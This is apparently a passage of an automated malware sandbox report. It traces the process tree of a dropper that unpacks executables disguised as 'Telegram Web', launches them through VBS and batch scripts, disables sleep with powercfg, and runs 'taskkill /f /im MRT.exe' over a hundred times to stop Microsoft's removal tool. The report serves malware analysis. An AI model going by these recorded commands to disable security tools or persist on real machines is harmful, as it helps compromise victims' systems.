        "C:\Users\Admin\AppData\Local\Comms\Rem.exe"
        13⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5956
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3692
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:396
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        14⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Dolmatinec.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3588
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Local\Comms\Rem.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Comms\Rem.exe
        
        "C:\Users\Admin\AppData\Local\Comms\Rem.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4924
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4508
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2672
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4468
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1852
        
        C:\Windows\system32\conhost.exe
        
        conhost.exe
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3144

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3812

C:\Users\Admin\AppData\Local\Temp\PDQ.exe
"C:\Users\Admin\AppData\Local\Temp\PDQ.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5012
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lopinarca.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lemon.bat" "
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4343.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\Seporant.exe
      Seporant.exe -pjYfhxrtFdPYPTWrdqBZB -dC:\Users\Admin\AppData\Local\Temp
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4012
    - - C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3468
    - - C:\Users\Admin\AppData\Local\Temp\TEMP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TEMP.exe"
        5⤵
        Executes dropped EXE
        
        PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\Comms.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Comms.exe"
        5⤵
        Executes dropped EXE
        
        PID:208
    - - C:\Users\Admin\AppData\Local\Temp\Telegram Web.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Telegram Web.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4540
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Telegram Web\Nylevoi.vbs"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1480
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe"
        7⤵
        Executes dropped EXE
        
        PID:1924
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Remote.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Telegram Web\Polylyahi.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4468
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe""
        8⤵
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        
        PID:4448
        
        C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe
        
        "C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\85D5.tmp\85D6.bat "C:\Users\Admin\AppData\Roaming\Telegram Web\Sinergiay.exe""
        10⤵
        
        PID:968
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5984
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5836
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5692
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4172
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4436
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:6036
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2188
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3456
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5728
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4132
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5268
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4288
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5164
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2448
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2616
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5416
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3100
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5236
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5268
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4864
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5144
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5884
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:2456
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4004
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4780
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4288
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3044
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6072
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4404
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5456
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2932
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3268
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5584
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4316
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:208
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:5796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5708
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6132
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5164
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5456
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:4464
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:3116
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1292
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5908
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2164
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5988
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3200
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1248
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5372
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:2932
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:3456
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5288
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:4540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:1576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        
        PID:5896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im MRT.exe
        11⤵
        Kills process with taskkill
        
        PID:1292
        
